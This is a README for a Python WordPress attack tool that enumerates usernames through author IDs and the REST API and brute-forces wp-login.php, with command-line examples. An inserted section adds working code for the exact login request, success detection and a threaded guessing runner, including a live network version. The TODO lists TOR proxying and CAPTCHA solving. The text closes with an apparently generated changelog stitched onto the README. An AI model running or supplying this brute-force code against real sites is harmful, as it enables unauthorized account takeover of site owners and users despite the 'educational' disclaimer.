WpScan is a simple yet effective WordPress security scanner written in Python that runs on Windows and Linux. It helps identify potential security weaknesses by checking for an exposed login page, default usernames, the REST API users endpoint, common WordPress misconfigurations, and by performing brute-force attacks against the login form.
⚠️ For educational and authorized security testing only.
- ✅ Detects the WordPress login page (`/wp-login.php`)
- ✅ Checks for default/common usernames
- ✅ Enumerates users via the `?author=N` pattern (with customizable range)
- ✅ Scans the REST API endpoint `/wp-json/wp/v2/users`
- ✅ Tests access to the `wp-includes` directory
- ✅ Performs multi-threaded brute-force attacks on the login page
- ✅ Supports specifying a single username or a file containing a list of usernames for brute-force
- ✅ Customizable number of threads for the brute-force attack
- ✅ Generates a custom wordlist based on enumerated usernames and default WordPress usernames
- ✅ Saves results in `.txt` files
- ✅ Clean and centered CLI UI using `pystyle` and `colorama`
- ✅ Compatible with Windows and Linux terminals
Requirements:
- Python 3.8+
- pip (Python package manager)

Install the dependencies:
```
pip install -r requirements.txt
```

Files:
- `default_users.txt`: A list of common usernames (admin, root, user, etc.).
- `users.txt`: Collected usernames found via enumeration.
- `combined_wordlist.txt`: Generated wordlist from `users.txt` and `default_users.txt` (if the `-gW` option is used).
Input a WordPress target URL (`http://` is prepended automatically if no scheme is given).
The scanner:
- Checks for `/wp-login.php`
- Looks for the `wp-includes` directory
- Tries enumerating users via `/?author=1` to `/?author=10` (range customizable with `--start_id` and `--end_id`)
- Attempts to fetch user data from `/wp-json/wp/v2/users`
- Performs a multi-threaded brute-force attack (if enabled with `-b`, `-U`, and `-W`)
Output is printed to the terminal and saved to `.txt` files.
Run the script:
```
python wpscan.py [options]
```
Options:
-u, --url: Target URL to scan (e.g., http://example.com/).
-wl, --login_panel: Find the WordPress login panel.
-eu, --enum_users: Enumerate usernames.
--start_id: Start ID for user enumeration (default: 1).
--end_id: End ID for user enumeration (default: 10).
-wi, --wp_includes: Check the wp-includes directory.
-b, --bruteforce: Enable brute-force attack.
-U, --username: Username or file containing usernames for the brute-force attack. If a file is provided, it should contain one username per line.
-W, --wordlist: Wordlist file for the brute-force attack.
-t, --threads: Number of threads for the brute-force attack (default: 5).
-gW, --gen_wordlist: Generate a wordlist from users.txt and default_users.txt.
-a, --all: Run all checks (login panel, wp-includes, enumerate users, wp-json, and brute-force if username and wordlist are provided).
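The brute-force options above leave two details implicit that decide whether the attack works at all: which form fields `wp-login.php` expects (`testcookie=1` must be sent together with the `wordpress_test_cookie` cookie, otherwise WordPress rejects every attempt with a "Cookies are blocked" message, and a scanner that ignores this reports every password as wrong), and how success is recognised (a 302 to `wp-admin/` that sets a `wordpress_logged_in_*` cookie; a failed attempt is a 200 carrying the form and a `login_error` div, and so is the page a lockout plugin serves once it starts blocking). The following added example, not part of WpScan, shows both plus a threaded runner that stops all workers at the first hit. `fake_target` and its credentials are constructed so the block runs offline; `http_attempt` is a hypothetical stdlib-only network variant that deliberately does not follow redirects.

```python
import threading
import urllib.error
import urllib.parse
import urllib.request
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# Added example, not WpScan's code: the request wp-login.php expects, the
# response that signals success, and a threaded runner with early stop.

def login_form(username: str, password: str) -> Dict[str, str]:
    """POST fields for wp-login.php. testcookie=1 has to travel with the
    wordpress_test_cookie cookie or WordPress answers 'Cookies are blocked'."""
    return {"log": username, "pwd": password, "wp-submit": "Log In", "testcookie": "1"}

LOGIN_COOKIE = "wordpress_test_cookie=WP Cookie check"

def is_login_success(status: int, headers: Dict[str, str], body: str) -> bool:
    """Success is a 302 that sets wordpress_logged_in_*. A failure is a 200 with
    the form and <div id="login_error">; a lockout page is also a 200, so a run
    of failures for one user is a signal to back off, not to try harder."""
    return status in (301, 302) and "wordpress_logged_in_" in headers.get("Set-Cookie", "")

Response = Tuple[int, Dict[str, str], str]          # (status, headers, body)
Attempt = Callable[[str, str], Response]

def brute_force(usernames: Iterable[str], passwords: Iterable[str],
                attempt: Attempt, threads: int = 5) -> Optional[Tuple[str, str]]:
    """Try every (user, password) pair with `threads` workers; stop everything
    at the first success. Returns the working pair or None."""
    passwords = list(passwords)                     # iterated once per user
    stop = threading.Event()
    lock = threading.Lock()
    hit: List[Tuple[str, str]] = []

    def worker(user: str, pwd: str) -> None:
        if stop.is_set():                           # another worker already won
            return
        status, headers, body = attempt(user, pwd)
        if is_login_success(status, headers, body):
            with lock:
                if not hit:
                    hit.append((user, pwd))
            stop.set()

    with ThreadPoolExecutor(max_workers=threads) as pool:
        futures = [pool.submit(worker, u, p) for u in usernames for p in passwords]
        for f in futures:
            f.result()                              # surface worker exceptions
    return hit[0] if hit else None

def http_attempt(login_url: str) -> Attempt:
    """Hypothetical network-backed attempt built on the standard library.
    Redirects are NOT followed: the 302 itself is the success signal."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None
    opener = urllib.request.build_opener(NoRedirect)

    def headers_of(msg) -> Dict[str, str]:          # keep every Set-Cookie, not just the last
        h = dict(msg)
        h["Set-Cookie"] = "; ".join(msg.get_all("Set-Cookie") or [])
        return h

    def attempt(user: str, pwd: str) -> Response:
        data = urllib.parse.urlencode(login_form(user, pwd)).encode()
        req = urllib.request.Request(login_url, data=data, headers={"Cookie": LOGIN_COOKIE})
        try:
            with opener.open(req, timeout=10) as resp:
                return resp.status, headers_of(resp.headers), resp.read().decode(errors="replace")
        except urllib.error.HTTPError as e:         # an unfollowed 3xx lands here
            return e.code, headers_of(e.headers), ""
    return attempt

# Constructed stand-in target (no network): only admin / Winter2024! is valid.
_CREDS = {"admin": "Winter2024!"}

def fake_target(user: str, pwd: str) -> Response:
    if _CREDS.get(user) == pwd:
        return 302, {"Location": "http://example.com/wp-admin/",
                     "Set-Cookie": "wordpress_logged_in_1a2b=admin%7C...; HttpOnly"}, ""
    return 200, {}, '<div id="login_error"><strong>Error:</strong> The password you entered is incorrect.</div>'

if __name__ == "__main__":
    print(brute_force(["admin", "editor"], ["password", "Winter2024!"], fake_target, threads=4))
```

`-t` maps directly onto `threads` here; note that more workers against one site only raises the chance of tripping a lockout plugin, which is why the success check refuses to treat any 200 as a hit.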
Examples:

Scan a single URL:
```
python wpscan.py -u http://example.com/
```
Find the login panel and enumerate users:
```
python wpscan.py -u http://example.com -wl -eu
```
Run all checks:
```
python wpscan.py -a -u http://example.com
```
Perform a brute-force attack with a single username:
```
python wpscan.py -u http://example.com/wp-login.php -b -U admin -W wordlist.txt -t 10
```
Perform a brute-force attack with usernames from a file:
```
python wpscan.py -u http://example.com/wp-login.php -b -U usernames.txt -W wordlist.txt -t 10
```
Generate a wordlist:
```
python wpscan.py -gW
```

Author: know56_All1
GitHub: https://github.com/know56All1
Wallet: lnbc1p5ytnx9pp5jgz4la4uxzgxey8ack9egdlhpahd3vrv29t0ylnjg3eetyzj240sdqqcqzzsxqzjcsp579y2q8kh97e6maa4v9c3at87mdmdzk3mlfm5xc2uyyghmva23dxq9p4gqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqpqysgqd5597626wmyn2fqhq6t7pj7jm2ka0rrlj5dp6e9e6d7llvcd4yup3luxlyvj7l9rqmwukhtqjkrc6z5ylsuh0kxl7cv4n55xmr2q04qqv76t95
This tool is intended for educational purposes only. Unauthorized scanning or attacking of systems you do not own or do not have explicit permission to test is illegal and strictly forbidden.
The author is not responsible for any misuse of this tool.
TODO:
- [ ] Proxy support (e.g. Burp Suite or TOR)
- [ ] Detection of vulnerable plugins and themes
- [ ] Better error handling and logging
- [ ] Implement rate limiting to avoid account lockouts
- [ ] Add support for CAPTCHA solving
Key changes and additions:
- Brute-force features: Added information about the brute-force attack, including the `-U`, `-W`, and `-t` options.
- Wordlist generation: Included information about the `-gW` option and the `combined_wordlist.txt` file.
- Customizable enumeration range: Mentioned the `--start_id` and `--end_id` options.
- Updated "How It Works" section: Reflects the new brute-force functionality.
- Added TODO items: Included rate limiting and CAPTCHA solving as future improvements.
- Minor formatting and wording improvements.
